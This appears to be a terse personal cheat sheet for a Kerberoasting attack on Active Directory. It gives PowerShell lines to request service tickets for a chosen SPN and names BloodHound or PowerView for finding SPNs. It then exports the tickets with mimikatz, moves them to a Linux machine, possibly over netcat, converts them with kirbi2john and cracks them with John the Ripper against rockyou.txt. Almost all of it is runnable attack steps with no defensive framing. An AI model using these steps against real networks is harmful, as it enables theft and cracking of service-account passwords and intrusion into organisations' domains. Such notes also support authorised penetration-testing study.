
using mimikatz

Type 1) & 2) in powershell or cmd , this will generate requested service ticket

1) Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList “<SPN>”

to get SPN, go to bloodhound>select service account>node info>spn
Or with 
PowerView  with the command Get-NetUser -username "svc_tgs" -SPN | select samaccountname, primarygroupid, serviceprincipalname

3) Run mimikatz.exe

4) kerberos::list /export , download service ticket

5) exit to exit mimikatz

6) dir to check output and select the desire file and transfer it on your linux machine (if netcat used then transfer it in binary)

7) kirbi2john <file> >hash.txt

8) john hash.txt —wordlist=rockyou.txt